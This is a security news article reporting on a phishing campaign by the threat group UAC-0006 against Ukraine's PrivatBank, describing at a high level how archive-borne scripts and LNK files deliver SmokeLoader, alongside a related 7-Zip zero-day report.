A financially motivated threat group tracked as UAC-0006 has resurfaced with a sophisticated phishing campaign targeting PrivatBank, Ukraine’s largest state-owned bank. The group is using advanced techniques to bypass detection and deploy SmokeLoader malware, which facilitates long-term access to compromised systems and the theft of sensitive financial data.
The campaign, discovered by cybersecurity analysts from CloudSEK, involves password-protected archives containing malicious JavaScript, VBScript, and LNK files. The files, once activated, execute a series of commands to inject malicious code into legitimate Windows binaries.
In this latest attack, cybercriminals send phishing emails with password-protected ZIP or RAR files. The files, disguised as legitimate invoices or other business-related attachments, contain malicious JavaScript or VBScript files. Once the file is extracted and opened, the scripts run PowerShell commands that deliver the SmokeLoader malware. The malware establishes command-and-control (C2) communication with the attacker’s servers, allowing the threat group to maintain persistent access to the compromised systems.
“More recently, we are starting to see UAC-0006 use an LNK lure in their phishing baits. When the .lnk file is executed, it runs powershell.exe with the specified command line arguments. This launches mshta.exe to retrieve and execute the file hosted on the C2 servers,” the researchers noted.
UAC-0006 has been actively targeting Ukrainian financial institutions since November 2024, using payment-themed phishing lures designed to trick users into downloading the malicious attachments.
The researchers noted overlap in UAC-0006’ s tactics, techniques, and procedures (TTPs) with other notorious cybercriminal groups, such as EmpireMonkey, which is thought to be linked to Carbanak, Anunak, and the infamous FIN7—a Russian cyber espionage group.
Earlier this month, cybersecurity firm Trend Micro reported that a zero-day vulnerability (CVE-2025-0411) in the popular open-source file archiver tool 7-Zip has been actively exploited by Russia-linked threat actors in a targeted SmokeLoader malware campaign against Ukrainian entities.
